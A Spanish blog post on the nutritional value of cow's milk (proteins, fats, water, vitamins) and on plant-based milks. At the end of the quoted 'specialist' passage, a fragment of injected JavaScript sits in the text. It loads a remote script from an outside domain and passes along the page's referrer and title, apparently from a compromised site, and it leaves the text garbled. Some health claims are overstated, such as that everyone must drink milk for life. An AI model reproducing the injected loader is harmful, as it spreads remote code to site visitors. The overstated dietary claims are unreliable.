Salud y belleza » Alimentación, Bienestar, Dieta

Buena leche

Sin Comentarios

Coloquialmente en España, y no en así en otras zonas también hispanoparlantes, el término “la leche” -en contexto: “¡tío, eres la leche!”- se utiliza para calificar a una persona como “especial” (su connotación es tanto positiva como negativa). Bien, así podríamos decir que la leche, el lacto, es la leche, es original (en un sentido plenamente positivista).

¿Por qué se trata de un alimento, de una bebida, de un infinito recurso alimentario tan bondadoso o gentil para el organismo? Por muchas razones. En efecto, la leche es realmente un alimento que, de hecho, nos acompaña desde nuestros primeros minutos de vida. Aquí algunas de las características más importantes.

La leche de vaca es realmente rica en proteínas: alberga un alto porcentaje distribuidas en caseínas, proteínas solubles (seroproteínas) y también sustancias nitrogenadas no proteicas. Un buen vaso de leche, es capaz de cubrir los requerimientos de aminoácidos del hombre; la leche también es un factor modulador del crecimiento y un alimento sumamente sencillo de digerir (por eso se recomienda ya desde temprana edad).

Por otra parte, los lípidos también están presentes en la leche: la leche entera de vaca, que se comercializa con un 3,5 por ciento de grasa, supone casi la mitad de la energía suministrada. Esto, claro, se debe a esos componentes fundamentales que son los ácidos grasos y representan el noventa por ciento de la masa de los glicéridos.
Ah, por cierto: la leche también es genial para mantener el cuerpo hidratado: está compuesta en un 88% de agua

Sigamos con otro tema importante: las vitaminas que hay en el producto lácteo fundacional. La leche, es una rica fuente de vitaminas de varios grupo como el B (B1, B2 y B12), A y también C.

Escuchemos la opinión de otros especialistas: “la leche es el alimento nutritivo por antonomasia. Desde nuestro nacimiento hasta nuestras últimas horas, debemos tomar leche. De hecho, los primeros años son los más importantes: la ausencia de leche en ese lapso no se recupera jamás. La leche es un producto natural rico en vitaminas, lípidos, proteínas pero también en azucares y sustancias minerales. De hecho, en la actualidad son miles las opciones no solo de consumir productos derivados de la leche sino diferentes tipos de leche en sí: otras alternativas a la leche de vaca en alérgicos a la proteína láctea son las llamadas leches vegetales.

La leche de arroz es ideal para personas con problemas de digestión y la leche de avena también es una gran opción por su alto contenido en vitamina B1 (tiamina), hierro, manganeso y ácidos grasos esenciales”.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else {

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.